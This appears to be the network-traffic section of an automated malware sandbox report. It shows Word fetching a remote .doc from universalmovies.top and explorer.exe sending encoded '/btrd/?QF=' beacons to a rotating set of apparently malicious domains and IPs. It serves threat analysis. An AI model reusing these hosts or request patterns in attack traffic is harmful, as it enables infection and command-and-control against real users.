Jun 25, 2024 15:15:34.221479893 CEST | 8.8.8.8 | 192.168.2.22 | 0xebec | No error (0) | www.cnoszirzbkaqz.com | cnoszirzbkaqz.com | | CNAME (Canonical name) | IN (0x0001) | false
Jun 25, 2024 15:15:34.221479893 CEST | 8.8.8.8 | 192.168.2.22 | 0xebec | No error (0) | cnoszirzbkaqz.com | | 167.172.228.26 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:15:34.375030994 CEST | 8.8.8.8 | 192.168.2.22 | 0xebec | No error (0) | www.cnoszirzbkaqz.com | cnoszirzbkaqz.com | | CNAME (Canonical name) | IN (0x0001) | false
Jun 25, 2024 15:15:34.375030994 CEST | 8.8.8.8 | 192.168.2.22 | 0xebec | No error (0) | cnoszirzbkaqz.com | | 167.172.228.26 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:15:55.165908098 CEST | 8.8.8.8 | 192.168.2.22 | 0x15a2 | No error (0) | www.naddafornadda.com | naddafornadda.com | | CNAME (Canonical name) | IN (0x0001) | false
Jun 25, 2024 15:15:55.165908098 CEST | 8.8.8.8 | 192.168.2.22 | 0x15a2 | No error (0) | naddafornadda.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:15:55.165908098 CEST | 8.8.8.8 | 192.168.2.22 | 0x15a2 | No error (0) | naddafornadda.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:16:15.031598091 CEST | 8.8.8.8 | 192.168.2.22 | 0xc2c0 | Name error (3) | www.turbrun.com | none | none | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:16:35.475580931 CEST | 8.8.8.8 | 192.168.2.22 | 0xb8e | Name error (3) | www.wzxq.xyz | none | none | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:16:55.772923946 CEST | 8.8.8.8 | 192.168.2.22 | 0xe8fb | No error (0) | www.texanboxes.com | texanboxes.com | | CNAME (Canonical name) | IN (0x0001) | false
Jun 25, 2024 15:16:55.772923946 CEST | 8.8.8.8 | 192.168.2.22 | 0xe8fb | No error (0) | texanboxes.com | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:16:55.772923946 CEST | 8.8.8.8 | 192.168.2.22 | 0xe8fb | No error (0) | texanboxes.com | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:16.452686071 CEST | 8.8.8.8 | 192.168.2.22 | 0xbbcb | No error (0) | www.outletivo.com | | 5.149.161.103 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:35.358678102 CEST | 8.8.8.8 | 192.168.2.22 | 0xf219 | No error (0) | www.380747.net | | 156.241.141.214 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:56.692616940 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf3a | No error (0) | www.emeraldsurrogatefabric.com | | 192.243.61.225 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:56.692616940 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf3a | No error (0) | www.emeraldsurrogatefabric.com | | 172.240.127.234 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:56.692616940 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf3a | No error (0) | www.emeraldsurrogatefabric.com | | 172.240.108.84 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:56.692616940 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf3a | No error (0) | www.emeraldsurrogatefabric.com | | 172.240.108.68 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:56.692616940 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf3a | No error (0) | www.emeraldsurrogatefabric.com | | 172.240.108.76 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:56.692616940 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf3a | No error (0) | www.emeraldsurrogatefabric.com | | 192.243.61.227 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:56.692616940 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf3a | No error (0) | www.emeraldsurrogatefabric.com | | 172.240.253.132 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:56.692616940 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf3a | No error (0) | www.emeraldsurrogatefabric.com | | 192.243.59.13 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:56.692616940 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf3a | No error (0) | www.emeraldsurrogatefabric.com | | 192.243.59.12 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:56.692616940 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf3a | No error (0) | www.emeraldsurrogatefabric.com | | 192.243.59.20 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:56.701594114 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf3a | No error (0) | www.emeraldsurrogatefabric.com | | 192.243.61.227 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:56.701594114 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf3a | No error (0) | www.emeraldsurrogatefabric.com | | 172.240.108.84 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:56.701594114 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf3a | No error (0) | www.emeraldsurrogatefabric.com | | 172.240.108.68 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:56.701594114 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf3a | No error (0) | www.emeraldsurrogatefabric.com | | 172.240.108.76 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:56.701594114 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf3a | No error (0) | www.emeraldsurrogatefabric.com | | 172.240.127.234 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:56.701594114 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf3a | No error (0) | www.emeraldsurrogatefabric.com | | 192.243.59.20 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:56.701594114 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf3a | No error (0) | www.emeraldsurrogatefabric.com | | 192.243.61.225 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:56.701594114 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf3a | No error (0) | www.emeraldsurrogatefabric.com | | 192.243.59.12 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:56.701594114 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf3a | No error (0) | www.emeraldsurrogatefabric.com | | 172.240.253.132 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:17:56.701594114 CEST | 8.8.8.8 | 192.168.2.22 | 0xcf3a | No error (0) | www.emeraldsurrogatefabric.com | | 192.243.59.13 | A (IP address) | IN (0x0001) | false
Jun 25, 2024 15:18:15.687892914 CEST | 8.8.8.8 | 192.168.2.22 | 0x38c8 | No error (0) | www.furryfriendsupply.store | furryfriendsupply.myshopify.com | | CNAME (Canonical name) | IN (0x0001) | false
Jun 25, 2024 15:18:15.687892914 CEST | 8.8.8.8 | 192.168.2.22 | 0x38c8 | No error (0) | furryfriendsupply.myshopify.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001) | false
Jun 25, 2024 15:18:15.687892914 CEST | 8.8.8.8 | 192.168.2.22 | 0x38c8 | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001) | false
• universalmovies.top
• www.onlynaturlpt.shop
• www.wirewizardselectric.net
• www.cnoszirzbkaqz.com
• www.naddafornadda.com
• www.texanboxes.com
• www.outletivo.com
• www.380747.net
• www.emeraldsurrogatefabric.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49176 | 104.21.89.47 | 80 | 1244 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jun 25, 2024 15:14:32.532372952 CEST | 173 | OUT | GET /btrd/?QF=ei06BbrL1XNnLWKSHbPo044PuME3Vv+0MArEui1DSIZtlWDrcB5dDFtUvldPnIarUtM2xw==&rr=F82tHBM8VV6X-vo HTTP/1.1
Host: www.onlynaturlpt.shop
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 25, 2024 15:14:34.047765017 CEST | 919 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 25 Jun 2024 13:14:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: http://onlynaturlpt.shop/btrd/?QF=ei06BbrL1XNnLWKSHbPo044PuME3Vv+0MArEui1DSIZtlWDrcB5dDFtUvldPnIarUtM2xw==&rr=F82tHBM8VV6X-vo
Vary: Accept-Encoding
X-Served-By: www.onlynaturlpt.shop
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zyBn5sLy5QZk%2FTO5ft04md77HdiOW5bL3UkKUUtegLe2Zf8GOMLSvLi%2BmK3PK1bxxfjBIy4frlXYn7dwIXGmCX%2BXXw9zciipDK3bXvJjfplQFIp4Gx4Unzv%2FCwmEo8pQydZB7WiB1V8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 899538a3fb2e4270-EWR
alt-svc: h3=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49177 | 15.197.148.33 | 80 | 1244 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jun 25, 2024 15:14:54.227211952 CEST | 179 | OUT | GET /btrd/?QF=4g1xeR4m3EPNXFQvrJzB56K+BPAX9uki7kS+nMlSCcqOR13OJ5fSn6jCC3gh4c3HUzbxQw==&rr=F82tHBM8VV6X-vo HTTP/1.1
Host: www.wirewizardselectric.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 25, 2024 15:14:54.688900948 CEST | 349 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Tue, 25 Jun 2024 13:14:54 GMT
Content-Type: text/html
Content-Length: 209
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 46 3d 34 67 31 78 65 52 34 6d 33 45 50 4e 58 46 51 76 72 4a 7a 42 35 36 4b 2b 42 50 41 58 39 75 6b 69 37 6b 53 2b 6e 4d 6c 53 43 63 71 4f 52 31 33 4f 4a 35 66 53 6e 36 6a 43 43 33 67 68 34 63 33 48 55 7a 62 78 51 77 3d 3d 26 72 72 3d 46 38 32 74 48 42 4d 38 56 56 36 58 2d 76 6f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?QF=4g1xeR4m3EPNXFQvrJzB56K+BPAX9uki7kS+nMlSCcqOR13OJ5fSn6jCC3gh4c3HUzbxQw==&rr=F82tHBM8VV6X-vo"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49178 | 167.172.228.26 | 80 | 1244 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jun 25, 2024 15:15:34.385117054 CEST | 173 | OUT | GET /btrd/?QF=iWZ7HQ0CWyfkF/Kk3421ksonIyAGE9NlyJN9a/ri56tzwIjQ6AOy1EoBknvhN8HBdF2LXg==&rr=F82tHBM8VV6X-vo HTTP/1.1
Host: www.cnoszirzbkaqz.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 25, 2024 15:15:34.949536085 CEST | 114 | IN | HTTP/1.1 404
Server: nginx/1.20.1
Date: Tue, 25 Jun 2024 13:15:34 GMT
Content-Length: 0
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49179 | 15.197.148.33 | 80 | 1244 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jun 25, 2024 15:15:55.182688951 CEST | 173 | OUT | GET /btrd/?QF=Y4OHzCgJWVe/aTk998zcBEsdCVoOVR410Fz81Fwxat8Qm64dtgVu5ywIvZ7n99il4dROUQ==&rr=F82tHBM8VV6X-vo HTTP/1.1
Host: www.naddafornadda.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 25, 2024 15:15:55.665208101 CEST | 349 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Tue, 25 Jun 2024 13:15:55 GMT
Content-Type: text/html
Content-Length: 209
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 46 3d 59 34 4f 48 7a 43 67 4a 57 56 65 2f 61 54 6b 39 39 38 7a 63 42 45 73 64 43 56 6f 4f 56 52 34 31 30 46 7a 38 31 46 77 78 61 74 38 51 6d 36 34 64 74 67 56 75 35 79 77 49 76 5a 37 6e 39 39 69 6c 34 64 52 4f 55 51 3d 3d 26 72 72 3d 46 38 32 74 48 42 4d 38 56 56 36 58 2d 76 6f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?QF=Y4OHzCgJWVe/aTk998zcBEsdCVoOVR410Fz81Fwxat8Qm64dtgVu5ywIvZ7n99il4dROUQ==&rr=F82tHBM8VV6X-vo"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.22 | 49180 | 3.33.130.190 | 80 | 1244 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jun 25, 2024 15:16:55.778409958 CEST | 170 | OUT | GET /btrd/?QF=8JOSXYLBILqnqGN87u1l6qhyR4gCsQ4B50iPBg5WSNoqgl4+2/FdKIi+y78puliTpEIA7Q==&rr=F82tHBM8VV6X-vo HTTP/1.1
Host: www.texanboxes.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 25, 2024 15:16:56.259752035 CEST | 349 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Tue, 25 Jun 2024 13:16:56 GMT
Content-Type: text/html
Content-Length: 209
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 46 3d 38 4a 4f 53 58 59 4c 42 49 4c 71 6e 71 47 4e 38 37 75 31 6c 36 71 68 79 52 34 67 43 73 51 34 42 35 30 69 50 42 67 35 57 53 4e 6f 71 67 6c 34 2b 32 2f 46 64 4b 49 69 2b 79 37 38 70 75 6c 69 54 70 45 49 41 37 51 3d 3d 26 72 72 3d 46 38 32 74 48 42 4d 38 56 56 36 58 2d 76 6f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?QF=8JOSXYLBILqnqGN87u1l6qhyR4gCsQ4B50iPBg5WSNoqgl4+2/FdKIi+y78puliTpEIA7Q==&rr=F82tHBM8VV6X-vo"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.22 | 49181 | 5.149.161.103 | 80 | 1244 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jun 25, 2024 15:17:16.459708929 CEST | 169 | OUT | GET /btrd/?QF=wAVsI0ZauuZe/AUfKMQS9arC9N7mEche6F3f3LieAEN9BV05ageRHgJkodQ/PaJpE4394Q==&rr=F82tHBM8VV6X-vo HTTP/1.1
Host: www.outletivo.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 25, 2024 15:17:17.329193115 CEST | 156 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 25 Jun 2024 13:17:17 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.22 | 49182 | 156.241.141.214 | 80 | 1244 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jun 25, 2024 15:17:35.364789009 CEST | 166 | OUT | GET /btrd/?QF=Q9lQV6GZS5XlTzDabQN0JcC/oAJcX56bqSzBmZTdiCofqsMdr9nyT/BrN0q/NN7gaO6C5w==&rr=F82tHBM8VV6X-vo HTTP/1.1
Host: www.380747.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.22 | 49183 | 192.243.61.227 | 80 | 1244 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Jun 25, 2024 15:17:56.714740038 CEST | 182 | OUT | GET /btrd/?QF=G5lr6/+HMLb4/5wZr2dUNb9GEJVmzQOhD2on9EEX18ujBqnljNww4TGU/x6wH+Q7WyKaqg==&rr=F82tHBM8VV6X-vo HTTP/1.1
Host: www.emeraldsurrogatefabric.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 25, 2024 15:17:57.177083969 CEST | 590 | IN | HTTP/1.1 301 Moved Permanently
Server: nginx/1.21.6
Date: Tue, 25 Jun 2024 13:17:57 GMT
Content-Type: text/html
Content-Length: 169
Connection: close
Location: https://google.com
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
X-Request-ID: f8e2a4e37fe7d6189aee5c997ec4a483
Cache-Control: max-age=0, private, no-cache
Pragma: no-cache
Strict-Transport-Security: max-age=0; includeSubdomains
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 36 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.21.6</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49166 | 172.67.162.95 | 443 | 2732 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | Bytes transferred | Direction | Data
2024-06-25 13:13:42 UTC | 141 | OUT | OPTIONS / HTTP/1.1
User-Agent: Microsoft Office Protocol Discovery
Host: universalmovies.top
Content-Length: 0
Connection: Keep-Alive
2024-06-25 13:13:42 UTC | 715 | IN | HTTP/1.1 200 OK
Date: Tue, 25 Jun 2024 13:13:42 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Allow: HEAD,GET,POST,OPTIONS,TRACE
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qII0PDSKv73Dq3%2FJv%2BV4PF9aQCn2R5p%2Bq1970xVsyNje1TEET3EsN10jF54weLaZHjY8xRZPCn22Qiihf3V%2BTisAwumsZYSm0u%2FNVIALSVJLNI0o9TBZMJQxhCSWXcRx7Qa1M8Al"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=0; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 899537688a84c425-EWR
alt-svc: h3=":443"; ma=86400
2024-06-25 13:13:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49167 | 172.67.162.95 | 443 | 2732 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | Bytes transferred | Direction | Data
2024-06-25 13:13:46 UTC | 128 | OUT | HEAD /nelb.doc HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft Office Existence Discovery
Host: universalmovies.top
2024-06-25 13:13:46 UTC | 841 | IN | HTTP/1.1 200 OK
Date: Tue, 25 Jun 2024 13:13:46 GMT
Content-Type: application/msword
Content-Length: 574773
Connection: close
Last-Modified: Tue, 25 Jun 2024 07:45:34 GMT
ETag: "667a759e-8c535"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
CF-Cache-Status: HIT
Age: 18275
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ht1Tj%2Fy6V9Su4sWi2Evu1U8OCZbdL09l3ZR170cFXIJkC55%2FBO5lcPbzC8%2FUEcMRZEbQJ0nEC72vVRwMI5gjGL0deCkjwCi%2Bi8vwLyCQZUq2g5vV63PwR9nkFhhidqrRJWzFVDBe"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=0; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 89953780c98b43b1-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port
2 | 192.168.2.22 | 49168 | 172.67.162.95 | 443
Timestamp | Bytes transferred | Direction | Data
2024-06-25 13:13:50 UTC | 136 | OUT | OPTIONS / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
translate: f
Host: universalmovies.top
2024-06-25 13:13:50 UTC | 713 | IN | HTTP/1.1 200 OK
Date: Tue, 25 Jun 2024 13:13:50 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Allow: HEAD,GET,POST,OPTIONS,TRACE
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZzUP0vqxQC4Wp0tVIkSGbyDNLASiELGTvc8YMS5KjSzon6kGtbT9%2Bq3KZVhlqeUM%2FFRYFZjwZzAtdkIUJwDxBXeUn0ktsf6uMixLAqFANnIm7e%2BN7Tne%2FELkdGaGu8qMzwqEUypS"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=0; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 899537995c734411-EWR
alt-svc: h3=":443"; ma=86400
2024-06-25 13:13:50 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 3  Source IP: 192.168.2.22  Source Port: 49169  Destination IP: 172.67.162.95  Destination Port: 443
2024-06-25 13:13:51 UTC  166 bytes  OUT
PROPFIND / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: universalmovies.top
2024-06-25 13:13:51 UTC  742 bytes  IN
HTTP/1.1 405 Method Not Allowed
Date: Tue, 25 Jun 2024 13:13:51 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
Allow: HEAD,GET,POST,OPTIONS,TRACE
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tsHbabaYknA9YKQLf5KQi%2FV%2BwPIs7Zcs1s50fSQvh%2Fitx4qMAJfpe8vnPyvlyg%2BNkMDpo7LWlpDqDqQSqUcmh4s%2FDH%2FTlVI2Korw%2FcgTTQ3POJXaRbEHbLGQW5akEPw%2FkJsbIHCz"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=0; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 899537a17c4318b8-EWR
alt-svc: h3=":443"; ma=86400
2024-06-25 13:13:51 UTC  231 bytes  IN
Data Ascii: e1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
2024-06-25 13:13:51 UTC  5 bytes  IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 4  Source IP: 192.168.2.22  Source Port: 49170  Destination IP: 172.67.162.95  Destination Port: 443
2024-06-25 13:13:53 UTC  166 bytes  OUT
PROPFIND / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: universalmovies.top
2024-06-25 13:13:53 UTC  732 bytes  IN
HTTP/1.1 405 Method Not Allowed
Date: Tue, 25 Jun 2024 13:13:53 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
Allow: HEAD,GET,POST,OPTIONS,TRACE
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X0s78kAOaJi4iIV2xw3dFkwmCuZuEqxrknVHVhTAhyOti4UrsNm7mLGOEw8o0%2BtaenfcXbUhVPg67S0RRO6JUG5mMCdko7KJoHH9LmmO5XrluKIB8ge%2BY2kzqYQDnMM8FJOdKJa%2F"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=0; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 899537ac8f0c420a-EWR
alt-svc: h3=":443"; ma=86400
2024-06-25 13:13:53 UTC  230 bytes  IN
Data Ascii: e0<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>
2024-06-25 13:13:53 UTC  6 bytes  IN
Data Raw: 31 0d 0a 0a 0d 0a
Data Ascii: 1
2024-06-25 13:13:53 UTC  5 bytes  IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 5  Source IP: 192.168.2.22  Source Port: 49171  Destination IP: 172.67.162.95  Destination Port: 443  PID: 2732  Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
2024-06-25 13:13:54 UTC  358 bytes  OUT
GET /nelb.doc HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: universalmovies.top
Connection: Keep-Alive
2024-06-25 13:13:54 UTC  839 bytes  IN
HTTP/1.1 200 OK
Date: Tue, 25 Jun 2024 13:13:54 GMT
Content-Type: application/msword
Content-Length: 574773
Connection: close
Last-Modified: Tue, 25 Jun 2024 07:45:34 GMT
ETag: "667a759e-8c535"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
CF-Cache-Status: HIT
Age: 18283
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rFO2vob0bpjy1F2PbtgLr5LknmMmscgPU8CJ2ou7vFUhvqF8AE5v1nFpcsB6f18VjPKS65MA2%2FCGR%2B41hvNUCo9BHva9o0EYwNRW4wlJ4dyawihcyOFRNf5Dj2PJH9VZTYP%2FvMa3"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=0; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 899537b1ffa743b5-EWR
alt-svc: h3=":443"; ma=86400
